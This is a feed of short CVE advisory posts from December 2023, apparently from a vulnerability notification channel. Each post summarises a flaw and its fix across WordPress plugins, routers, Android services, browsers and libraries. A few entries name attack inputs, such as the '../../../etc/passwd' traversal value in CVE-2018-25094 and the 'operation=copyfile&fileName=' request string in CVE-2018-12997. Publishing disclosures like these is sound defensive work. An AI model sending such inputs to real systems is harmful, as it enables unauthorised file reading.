🚨 CVE-2020-36646A vulnerability classified as problematic has been found in MediaArea ZenLib up to 0.4.38. This affects the function Ztring::Date_From_Seconds_1970_Local of the file Source/ZenLib/Ztring.cpp. The manipulation of the argument Value leads to unchecked return value to null pointer dereference. Upgrading to version 0.4.39 is able to address this issue. The identifier of the patch is 6475fcccd37c9cf17e0cfe263b5fe0e2e47a8408. It is recommended to upgrade the affected component. The identifier VDB-217629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 01:29:56 |
🚨 CVE-2020-36639A vulnerability has been found in AlliedModders AMX Mod X on Windows and classified as critical. This vulnerability affects the function cmdVoteMap of the file plugins/adminvote.sma of the component Console Command Handler. The manipulation of the argument amx_votemap leads to path traversal. The patch is identified as a5f2b5539f6d61050b68df8b22ebb343a2862681. It is recommended to apply a patch to fix this issue. VDB-217354 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-08 00:30:20 |
🚨 CVE-2023-5008Student Information System v1.0 is vulnerable to an unauthenticated SQL Injection vulnerability on the 'regno' parameter of index.php page, allowing an external attacker to dump all the contents of the database contents and bypass the login control.🎖@cveNotify |
|
| 2023-12-08 00:30:19 |
🚨 CVE-2023-45849An arbitrary code execution which results in privilege escalation was discovered in Helix Core versions prior to 2023.2. Reported by Jason Geffner.🎖@cveNotify |
|
| 2023-12-07 23:29:56 |
🚨 CVE-2011-0448Ruby on Rails 3.0.x before 3.0.4 does not ensure that arguments to the limit function specify integer values, which makes it easier for remote attackers to conduct SQL injection attacks via a non-numeric argument.🎖@cveNotify |
|
| 2023-12-07 22:30:09 |
🚨 CVE-2023-6580A vulnerability, which was classified as critical, was found in D-Link DIR-846 FW100A53DBR. This affects an unknown part of the file /HNAP1/ of the component QoS POST Handler. The manipulation of the argument smartqos_express_devices/smartqos_normal_devices leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247161 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-07 22:30:03 |
🚨 CVE-2023-6579A vulnerability, which was classified as critical, has been found in osCommerce 4. Affected by this issue is some unknown functionality of the file /b2b-supermarket/shopping-cart of the component POST Parameter Handler. The manipulation of the argument estimate[country_id] leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-247160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-07 22:30:02 |
🚨 CVE-2021-43114FORT Validator versions prior to 1.5.2 will crash if an RPKI CA publishes an X.509 EE certificate. This will lead to RTR clients such as BGP routers to lose access to the RPKI VRP data set, effectively disabling Route Origin Validation.🎖@cveNotify |
|
| 2023-12-07 22:30:01 |
🚨 CVE-2021-33571In Django 2.2 before 2.2.24, 3.x before 3.1.12, and 3.2 before 3.2.4, URLValidator, validate_ipv4_address, and validate_ipv46_address do not prohibit leading zero characters in octal literals. This may allow a bypass of access control that is based on IP addresses. (validate_ipv4_address and validate_ipv46_address are unaffected with Python 3.9.5+..) .🎖@cveNotify |
|
| 2023-12-07 22:29:57 |
🚨 CVE-2020-35857An issue was discovered in the trust-dns-server crate before 0.18.1 for Rust. DNS MX and SRV null targets are mishandled, causing stack consumption.🎖@cveNotify |
|
| 2023-12-07 22:29:56 |
🚨 CVE-2016-5851python-docx before 0.8.6 allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted document.🎖@cveNotify |
|
| 2023-12-07 21:30:01 |
🚨 CVE-2023-48910Microcks up to 1.17.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.🎖@cveNotify |
|
| 2023-12-07 21:29:57 |
🚨 CVE-2023-48965An issue in the component /admin/api.plugs/script of ThinkAdmin v6.1.53 allows attackers to getshell via providing a crafted URL to download a malicious PHP file.🎖@cveNotify |
|
| 2023-12-07 21:29:56 |
🚨 CVE-2023-41613EzViz Studio v2.2.0 is vulnerable to DLL hijacking.🎖@cveNotify |
|
| 2023-12-07 21:00:01 |
🚨 CVE-2023-5105The Frontend File Manager Plugin WordPress plugin before 22.6 has a vulnerability that allows an Editor+ user to bypass the file download logic and download files such as `wp-config.php`🎖@cveNotify |
|
| 2023-12-07 20:59:57 |
🚨 CVE-2023-49080The Jupyter Server provides the backend (i.e. the core services, APIs, and REST endpoints) for Jupyter web applications like Jupyter notebook, JupyterLab, and Voila. Unhandled errors in API requests coming from an authenticated user include traceback information, which can include path information. There is no known mechanism by which to trigger these errors without authentication, so the paths revealed are not considered particularly sensitive, given that the requesting user has arbitrary execution permissions already in the same environment. A fix has been introduced in commit `0056c3aa52` which no longer includes traceback information in JSON error responses. For compatibility, the traceback field is present, but always empty. This commit has been included in version 2.11.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-07 20:59:56 |
🚨 CVE-2023-48800In TOTOLINK X6000R_Firmware V9.4.0cu.852_B20230719, the shttpd file sub_417338 function obtains fields from the front-end, connects them through the snprintf function, and passes them to the CsteSystem function, resulting in a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-07 20:30:14 |
🚨 CVE-2023-49464libheif v1.17.5 was discovered to contain a segmentation violation via the function UncompressedImageCodec::get_luma_bits_per_pixel_from_configuration_unci.🎖@cveNotify |
|
| 2023-12-07 20:30:08 |
🚨 CVE-2023-49463libheif v1.17.5 was discovered to contain a segmentation violation via the function find_exif_tag at /libheif/exif.cc.🎖@cveNotify |
|
| 2023-12-07 20:30:07 |
🚨 CVE-2023-5210The AMP+ Plus WordPress plugin through 3.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-07 20:30:06 |
🚨 CVE-2023-5141The BSK Contact Form 7 Blacklist WordPress plugin through 1.0.1 does not sanitise and escape the inserted_count parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-07 20:30:03 |
🚨 CVE-2023-5108The Easy Newsletter Signups WordPress plugin through 1.0.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin🎖@cveNotify |
|
| 2023-12-07 20:30:02 |
🚨 CVE-2023-32804Out-of-bounds Write vulnerability in Arm Ltd Midgard GPU Userspace Driver, Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a local non-privileged user to write a constant pattern to a limited amount of memory not allocated by the user space driver.This issue affects Midgard GPU Userspace Driver: from r0p0 through r32p0; Bifrost GPU Userspace Driver: from r0p0 through r44p0; Valhall GPU Userspace Driver: from r19p0 through r44p0; Arm 5th Gen GPU Architecture Userspace Driver: from r41p0 through r44p0.🎖@cveNotify |
|
| 2023-12-07 20:30:01 |
🚨 CVE-2023-42852A logic issue was addressed with improved checks. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-12-07 20:29:57 |
🚨 CVE-2023-41976A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-12-07 20:29:56 |
🚨 CVE-2018-12997Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring.🎖@cveNotify |
|
| 2023-12-07 20:00:01 |
🚨 CVE-2023-5874The Popup box WordPress plugin before 3.8.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-12-07 19:59:57 |
🚨 CVE-2023-6481A serialization vulnerability in logback receiver component part of logback version 1.4.13, 1.3.13 and 1.2.12 allows an attacker to mount a Denial-Of-Service attack by sending poisoned data.🎖@cveNotify |
|
| 2023-12-07 19:59:56 |
🚨 CVE-2023-44306Dell DM5500 contains a path traversal vulnerability in PPOE Component. A remote attacker with high privileges could potentially exploit this vulnerability to overwrite the files stored on the server filesystem.🎖@cveNotify |
|
| 2023-12-07 19:30:09 |
🚨 CVE-2023-21402There is elevation of privilege.🎖@cveNotify |
|
| 2023-12-07 19:30:03 |
🚨 CVE-2023-21401There is elevation of privilege.🎖@cveNotify |
|
| 2023-12-07 19:30:02 |
🚨 CVE-2023-21227There is information disclosure.🎖@cveNotify |
|
| 2023-12-07 19:30:01 |
🚨 CVE-2023-5951The Welcart e-Commerce WordPress plugin before 2.9.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-07 19:29:57 |
🚨 CVE-2023-42748In telecom service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 19:29:56 |
🚨 CVE-2023-49914InteraXon Muse 2 devices allow remote attackers to cause a denial of service (incorrect Muse App report of an outstanding, calm meditation state) via a 480 MHz RF carrier that is modulated by a "false" brain wave, aka a Brain-Hack attack. For example, the Muse App does not display the reception of a strong RF carrier, and alert the user that a report may be misleading if this carrier has been modulated by a low-frequency signal.🎖@cveNotify |
|
| 2023-12-07 19:00:05 |
🚨 CVE-2008-2250The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability."🎖@cveNotify |
|
| 2023-12-07 18:59:59 |
🚨 CVE-2008-4114srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability."🎖@cveNotify |
|
| 2023-12-07 18:59:58 |
🚨 CVE-2008-1544The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 5.01, 6, and 7 does not block dangerous HTTP request headers when certain 8-bit character sequences are appended to a header name, which allows remote attackers to (1) conduct HTTP request splitting and HTTP request smuggling attacks via an incorrect Content-Length header, (2) access arbitrary virtual hosts via a modified Host header, (3) bypass referrer restrictions via an incorrect Referer header, and (4) bypass the same-origin policy and obtain sensitive information via a crafted request header.🎖@cveNotify |
|
| 2023-12-07 18:59:57 |
🚨 CVE-2007-3091Race condition in Microsoft Internet Explorer 6 SP1; 6 and 7 for Windows XP SP2 and SP3; 6 and 7 for Server 2003 SP2; 7 for Vista Gold, SP1, and SP2; and 7 for Server 2008 SP2 allows remote attackers to execute arbitrary code or perform other actions upon a page transition, with the permissions of the old page and the content of the new page, as demonstrated by setInterval functions that set location.href within a try/catch expression, aka the "bait & switch vulnerability" or "Race Condition Cross-Domain Information Disclosure Vulnerability."🎖@cveNotify |
|
| 2023-12-07 18:00:13 |
🚨 CVE-2023-32845In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01128524; Issue ID: MOLY01139296 (MSV-860).🎖@cveNotify |
|
| 2023-12-07 18:00:12 |
🚨 CVE-2023-32844In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01128524; Issue ID: MOLY01130183 (MSV-850).🎖@cveNotify |
|
| 2023-12-07 18:00:08 |
🚨 CVE-2023-32842In 5G Modem, there is a possible system crash due to improper error handling. This could lead to remote denial of service when receiving malformed RRC messages, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01130256; Issue ID: MOLY01130256 (MSV-848).🎖@cveNotify |
|
| 2023-12-07 18:00:07 |
🚨 CVE-2023-38727IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted SQL statement. IBM X-Force ID: 262257.🎖@cveNotify |
|
| 2023-12-07 18:00:02 |
🚨 CVE-2023-42742In sysui, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 18:00:01 |
🚨 CVE-2023-42710In firewall service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 17:59:57 |
🚨 CVE-2022-29546HtmlUnit NekoHtml Parser before 2.61.0 suffers from a denial of service vulnerability. Crafted input associated with the parsing of Processing Instruction (PI) data leads to heap memory consumption. This is similar to CVE-2022-28366 but affects a much later version of the product.🎖@cveNotify |
|
| 2023-12-07 17:59:56 |
🚨 CVE-2020-5529HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes Rhino engine improperly, hence a malicious JavScript code can execute arbitrary Java code on the application. Moreover, when embedded in Android application, Android-specific initialization of Rhino engine is done in an improper way, hence a malicious JavaScript code can execute arbitrary Java code on the application.🎖@cveNotify |
|
| 2023-12-07 17:30:09 |
🚨 CVE-2023-49410Tenda W30E V16.01.0.12(4843) was discovered to contain a stack overflow via the function via the function set_wan_status.🎖@cveNotify |
|
| 2023-12-07 17:30:03 |
🚨 CVE-2023-49403Tenda W30E V16.01.0.12(4843) was discovered to contain a command injection vulnerability via the function setFixTools.🎖@cveNotify |
|
| 2023-12-07 17:30:02 |
🚨 CVE-2023-42739In engineermode service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 17:30:01 |
🚨 CVE-2023-42720In video service, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 17:29:57 |
🚨 CVE-2023-42718In dialer, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 17:29:56 |
🚨 CVE-2023-42715In telephony service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 17:00:07 |
🚨 CVE-2023-42736In telecom service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 17:00:00 |
🚨 CVE-2023-42734In telephony service, there is a possible missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 16:59:59 |
🚨 CVE-2023-42721In flv extractor, there is a possible missing verification incorrect input. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 16:30:27 |
🚨 CVE-2023-49955An issue was discovered in Dalmann OCPP.Core before 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. It does not validate the length of the chargePointVendor field in a BootNotification message, potentially leading to server instability and a denial of service when processing excessively large inputs. NOTE: the vendor's perspective is "OCPP.Core is intended for use in a protected environment/network."🎖@cveNotify |
|
| 2023-12-07 16:30:26 |
🚨 CVE-2023-47548URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SoftLab Integrate Google Drive – Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site.This issue affects Integrate Google Drive – Browse, Upload, Download, Embed, Play, Share, Gallery, and Manage Your Google Drive Files Into Your WordPress Site: from n/a through 1.3.2.🎖@cveNotify |
|
| 2023-12-07 16:30:25 |
🚨 CVE-2023-45762URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Michael Uno (miunosoft) Responsive Column Widgets.This issue affects Responsive Column Widgets: from n/a through 1.2.7.🎖@cveNotify |
|
| 2023-12-07 16:30:24 |
🚨 CVE-2023-48325URL Redirection to Untrusted Site ('Open Redirect') vulnerability in PluginOps Landing Page Builder – Lead Page – Optin Page – Squeeze Page – WordPress Landing Pages.This issue affects Landing Page Builder – Lead Page – Optin Page – Squeeze Page – WordPress Landing Pages: from n/a through 1.5.1.5.🎖@cveNotify |
|
| 2023-12-07 16:30:20 |
🚨 CVE-2023-35909Uncontrolled Resource Consumption vulnerability in Saturday Drive Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress leading to DoS.This issue affects Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress: from n/a through 3.6.25.🎖@cveNotify |
|
| 2023-12-07 16:30:19 |
🚨 CVE-2023-32855In aee, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07909204; Issue ID: ALPS07909204.🎖@cveNotify |
|
| 2023-12-07 16:30:15 |
🚨 CVE-2023-32853In rpmb, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07648764; Issue ID: ALPS07648764.🎖@cveNotify |
|
| 2023-12-07 16:30:14 |
🚨 CVE-2023-46167IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used. IBM X-Force ID: 269367.🎖@cveNotify |
|
| 2023-12-07 16:30:13 |
🚨 CVE-2023-42751In gnss service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed🎖@cveNotify |
|
| 2023-12-07 16:30:09 |
🚨 CVE-2023-42723In camera service, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 16:30:08 |
🚨 CVE-2023-42696In telecom service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 15:00:13 |
🚨 CVE-2023-42705In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 15:00:10 |
🚨 CVE-2023-42704In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 15:00:09 |
🚨 CVE-2023-42702In firewall service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 15:00:08 |
🚨 CVE-2023-42700In firewall service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 15:00:04 |
🚨 CVE-2023-42698In omacp service, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-07 15:00:03 |
🚨 CVE-2023-49946In Forgejo before 1.20.5-1, certain endpoints do not check whether an object belongs to a repository for which permissions are being checked. This allows remote attackers to read private issues, read private pull requests, delete issues, and perform other unauthorized actions.🎖@cveNotify |
|
| 2023-12-07 15:00:02 |
🚨 CVE-2023-45178IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 CLI is vulnerable to a denial of service when a specially crafted request is used. IBM X-Force ID: 268073.🎖@cveNotify |
|
| 2023-12-07 13:30:01 |
🚨 CVE-2023-49958An issue was discovered in Dalmann OCPP.Core through 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. The server processes mishandle StartTransaction messages containing additional, arbitrary properties, or duplicate properties. The last occurrence of a duplicate property is accepted. This could be exploited to alter transaction records or impact system integrity.🎖@cveNotify |
|
| 2023-12-07 13:29:57 |
🚨 CVE-2023-49955An issue was discovered in Dalmann OCPP.Core before 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. It does not validate the length of the chargePointVendor field in a BootNotification message, potentially leading to server instability and a denial of service when processing excessively large inputs. NOTE: the vendor's perspective is "OCPP.Core is intended for use in a protected environment/network."🎖@cveNotify |
|
| 2023-12-07 13:29:56 |
🚨 CVE-2023-45762URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Michael Uno (miunosoft) Responsive Column Widgets.This issue affects Responsive Column Widgets: from n/a through 1.2.7.🎖@cveNotify |
|
| 2023-12-07 12:29:58 |
🚨 CVE-2023-46751An issue was discovered in the function gdev_prn_open_printer_seekable() in Artifex Ghostscript through 10.02.0 allows remote attackers to crash the application via a dangling pointer.🎖@cveNotify |
|
| 2023-12-07 12:29:57 |
🚨 CVE-2023-35116jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker.🎖@cveNotify |
|
| 2023-12-07 11:30:09 |
🚨 CVE-2023-41804Server-Side Request Forgery (SSRF) vulnerability in Brainstorm Force Starter Templates — Elementor, WordPress & Beaver Builder Templates.This issue affects Starter Templates — Elementor, WordPress & Beaver Builder Templates: from n/a through 3.2.4.🎖@cveNotify |
|
| 2023-12-07 11:30:08 |
🚨 CVE-2022-45362Server-Side Request Forgery (SSRF) vulnerability in Paytm Paytm Payment Gateway.This issue affects Paytm Payment Gateway: from n/a through 2.7.0.🎖@cveNotify |
|
| 2023-12-07 10:30:09 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2023-12-07 09:29:56 |
🚨 CVE-2023-50164An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.1 or greater to fix this issue.🎖@cveNotify |
|
| 2023-12-07 08:29:57 |
🚨 CVE-2023-48861DLL hijacking vulnerability in TTplayer version 7.0.2, allows local attackers to escalate privileges and execute arbitrary code via urlmon.dll.🎖@cveNotify |
|
| 2023-12-07 08:29:56 |
🚨 CVE-2023-44761Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS versions affected to 8.5.13 and below, and 9.0.0 through 9.2.1 allow a local attacker to execute arbitrary code via a crafted script to the Forms of the Data objects.🎖@cveNotify |
|
| 2023-12-07 07:30:14 |
🚨 CVE-2023-48826Time Slots Booking Calendar 4.0 is vulnerable to CSV Injection via the unique ID field of the Reservations List.🎖@cveNotify |
|
| 2023-12-07 07:30:07 |
🚨 CVE-2023-48823A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.🎖@cveNotify |
|
| 2023-12-07 07:30:06 |
🚨 CVE-2023-48207Availability Booking Calendar 5.0 allows CSV injection via the unique ID field in the Reservations list component.🎖@cveNotify |
|
| 2023-12-07 07:30:02 |
🚨 CVE-2023-43304An issue in PARK DANDAN mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2023-12-07 07:30:01 |
🚨 CVE-2023-43302An issue in sanTas mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2023-12-07 07:29:57 |
🚨 CVE-2023-43299An issue in DA BUTCHERS mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2023-12-07 07:29:56 |
🚨 CVE-2023-49298OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related in realistic situations. A possible example is cp, from a recent GNU Core Utilities (coreutils) version, when attempting to preserve a rule set for denying unauthorized access. (One might use cp when configuring access control, such as with the /etc/hosts.deny file specified in the IBM Support reference.) NOTE: this issue occurs less often in version 2.2.1, and in versions before 2.1.4, because of the default configuration in those versions.🎖@cveNotify |
|
| 2023-12-07 06:30:01 |
🚨 CVE-2023-48172A Cross Site Scripting (XSS) vulnerability in Shuttle Booking Software 2.0 allows a remote attacker to inject JavaScript via the name, description, title, or address parameter to index.php.🎖@cveNotify |
|
| 2023-12-07 06:29:57 |
🚨 CVE-2023-46857Squidex before 7.9.0 allows XSS via an SVG document to the Upload Assets feature. This occurs because there is an incomplete blacklist in the SVG inspection, allowing JavaScript in the SRC attribute of an IFRAME element. An authenticated attack with assets.create permission is required for exploitation.🎖@cveNotify |
|
| 2023-12-07 06:29:56 |
🚨 CVE-2023-43102An issue was discovered in Zimbra Collaboration (ZCS) before 10.0.4. An XSS issue can be exploited to access the mailbox of an authenticated user. This is also fixed in 8.8.15 Patch 43 and 9.0.0 Patch 36.🎖@cveNotify |
|
| 2023-12-07 04:30:07 |
🚨 CVE-2023-40238A LogoFAIL issue was discovered in BmpDecoderDxe in Insyde InsydeH2O with kernel 5.2 before 05.28.47, 5.3 before 05.37.47, 5.4 before 05.45.47, 5.5 before 05.53.47, and 5.6 before 05.60.47 for certain Lenovo devices. Image parsing of crafted BMP logo files can copy data to a specific address during the DXE phase of UEFI execution. This occurs because of an integer signedness error involving PixelHeight and PixelWidth during RLE4/RLE8 compression.🎖@cveNotify |
|
| 2023-12-07 03:29:57 |
🚨 CVE-2023-47627aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. The HTTP parser in AIOHTTP has numerous problems with header parsing, which could lead to request smuggling. This parser is only used when AIOHTTP_NO_EXTENSIONS is enabled (or not using a prebuilt wheel). These bugs have been addressed in commit `d5c12ba89` which has been included in release version 3.8.6. Users are advised to upgrade. There are no known workarounds for these issues.🎖@cveNotify |
|
| 2023-12-07 03:29:56 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2023-12-07 02:30:08 |
🚨 CVE-2023-5761The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'url' parameter in versions 1.4.0 to 1.4.6.1 (free) and versions 1.4.0 to 1.5.0 (pro) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2023-12-07 02:30:03 |
🚨 CVE-2023-5713The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_option_value() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve potentially sensitive option values, and deserialize the content of those values.🎖@cveNotify |
|
| 2023-12-07 02:30:02 |
🚨 CVE-2023-5710The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_constants() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information such as database credentials.🎖@cveNotify |
|
| 2023-12-07 02:29:57 |
🚨 CVE-2018-25094A vulnerability was found in ???????????????? Online Accounting System up to 1.4.0 and classified as problematic. This issue affects some unknown processing of the file ckeditor/filemanager/browser/default/image.php. The manipulation of the argument fid with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The identifier of the patch is 9d9618422b980335bb30be612ea90f4f56cb992c. It is recommended to upgrade the affected component. The identifier VDB-246641 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-07 02:29:56 |
🚨 CVE-2023-48810In TOTOLINK X6000R V9.4.0cu.852_B20230719, the shttpd file, sub_4119A0 function obtains fields from the front-end through Uci_ Set_ The Str function when passed to the CsteSystem function creates a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-07 02:00:01 |
🚨 CVE-2023-48812In TOTOLINK X6000R V9.4.0cu.852_B20230719, the shttpd file sub_4119A0 function obtains fields from the front-end through Uci_ Set_ The Str function that when passed to the CsteSystem function creates a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-07 01:59:57 |
🚨 CVE-2023-48807In TOTOLINK X6000R V9.4.0cu.852_B20230719, the shttpd file, sub_4119A0 function obtains fields from the front-end through Uci_ Set_ The Str function when passed to the CsteSystem function creates a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-07 01:59:56 |
